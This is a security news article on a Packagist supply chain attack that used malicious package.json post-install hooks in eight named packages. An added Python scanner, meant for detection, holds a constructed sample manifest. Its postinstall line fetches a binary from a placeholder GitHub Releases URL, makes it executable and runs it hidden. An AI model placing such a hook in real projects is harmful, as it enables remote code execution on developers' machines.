A recent coordinated supply chain attack has compromised eight packages on Packagist, using malicious code that downloads and executes a Linux binary fetched from a GitHub Releases URL. This incident highlights significant vulnerabilities within the software distribution ecosystem.
Details of the Attack
The affected packages, all Composer packages, were infiltrated through an unusual method. The malicious code was inserted into package.json, rather than the more commonly scrutinized composer.json. This approach targeted projects that incorporate JavaScript build tools alongside PHP code, evading detection by those focusing solely on Composer-related metadata.
This strategic cross-ecosystem insertion poses challenges for developers and security teams, as it exploits lifecycle hooks within package.json that may be overlooked during standard PHP dependency scans. Although the malicious versions have been removed from Packagist, the breach underscores the need for comprehensive security practices.
Technical Analysis and Package Impact
Analysis reveals that the upstream repositories of these packages were altered to include a post-install script. This script attempts to download a Linux binary from a specified GitHub Releases URL, save it under the /tmp/.sshd directory, change its permissions so that any user can execute it, and run it in the background.
The following packages and their respective versions were impacted:
- moritz-sauer-13/silverstripe-cms-theme (dev-master)
- crosiersource/crosierlib-base (dev-master)
- devdojo/wave (dev-main)
- devdojo/genesis (dev-main)
- katanaui/katana (dev-main)
- elitedevsquad/sidecar-laravel (3.x-dev)
- r2luna/brain (dev-main)
- baskarcm/tzi-chat-ui (dev-main)
Broader Implications and Unclear Payloads
Further investigation by Socket has uncovered references to this payload in 777 files across GitHub, indicating a potentially larger campaign. However, the exact extent of these breaches—whether they represent unique compromises, forks, or other forms of duplication—remains uncertain.
The payload was triggered by package.json post-install scripts in the published package artifacts and was also embedded within GitHub Actions workflows. The precise function of the binary downloaded from GitHub is unknown, as the account hosting it is no longer active. The malware was named “gvfsd-network,” mimicking the name of a GNOME Virtual File System daemon that manages network shares.
Despite the absence of a second-stage binary, the dangerous installer warrants immediate attention. It enables remote code execution during installation or build processes, obscuring its operations by disabling TLS verification, suppressing errors, and executing downloaded binaries discreetly.
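One way to audit a repository for the installer behaviour described above is to scan the lifecycle hooks in package.json for the indicators named in this article (GitHub Releases download, hidden file under /tmp, world-executable permissions, background execution, disabled TLS verification, suppressed errors). This is an added example, not code from the article or from Socket; the sample manifest and the EXAMPLE-ORG/EXAMPLE-REPO URL are constructed placeholders, not the real payload.

```python
import json
import re

# Lifecycle hooks that npm, yarn and pnpm run automatically on install or build.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}

# Heuristic indicators drawn from the installer behaviour described in the article.
# One hit alone is common in legitimate scripts; several together deserve a manual look.
INDICATORS = [
    ("downloads from GitHub Releases", re.compile(r"github\.com/[^\s\"']+/releases/download/")),
    ("uses a network fetch tool", re.compile(r"\b(curl|wget)\b")),
    ("writes a hidden file under /tmp", re.compile(r"/tmp/\.[\w-]+")),
    ("makes a file executable", re.compile(r"chmod\s+(\+x|a\+x|[0-7]?[1357][1357][1357])")),
    ("runs a process in the background", re.compile(r"(\bnohup\b|&\s*$|&\s*;|\bsetsid\b)")),
    ("disables TLS verification", re.compile(r"(--insecure|\s-[a-zA-Z]*k\b|--no-check-certificate)")),
    ("suppresses errors", re.compile(r"(2>\s*/dev/null|\|\|\s*true)")),
]

def scan_package_json(text):
    """Return {hook_name: [indicator labels]} for lifecycle hooks that look suspicious."""
    scripts = json.loads(text).get("scripts", {})
    findings = {}
    for hook, command in scripts.items():
        if hook not in LIFECYCLE_HOOKS or not isinstance(command, str):
            continue  # ordinary build/test scripts are not run automatically on install
        hits = [label for label, pattern in INDICATORS if pattern.search(command)]
        if hits:
            findings[hook] = hits
    return findings

# Constructed sample manifest modelled on the behaviour described above (placeholder URL).
SAMPLE_MANIFEST = json.dumps({
    "name": "example-theme",
    "scripts": {
        "build": "vite build",
        "postinstall": (
            "curl -sk https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/releases/download/v1/gvfsd-network"
            " -o /tmp/.sshd/gvfsd-network 2>/dev/null; chmod 777 /tmp/.sshd/gvfsd-network;"
            " nohup /tmp/.sshd/gvfsd-network >/dev/null 2>&1 &"
        ),
    },
})

if __name__ == "__main__":
    for hook, hits in scan_package_json(SAMPLE_MANIFEST).items():
        print(f"{hook}: " + "; ".join(hits))
```

Running the same scan over every package.json in a monorepo, and over the `run:` steps of GitHub Actions workflows, covers both delivery paths the article mentions.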
This incident serves as a critical reminder of the importance of vigilant security practices and the need for multi-layered defense strategies to protect against evolving cyber threats.
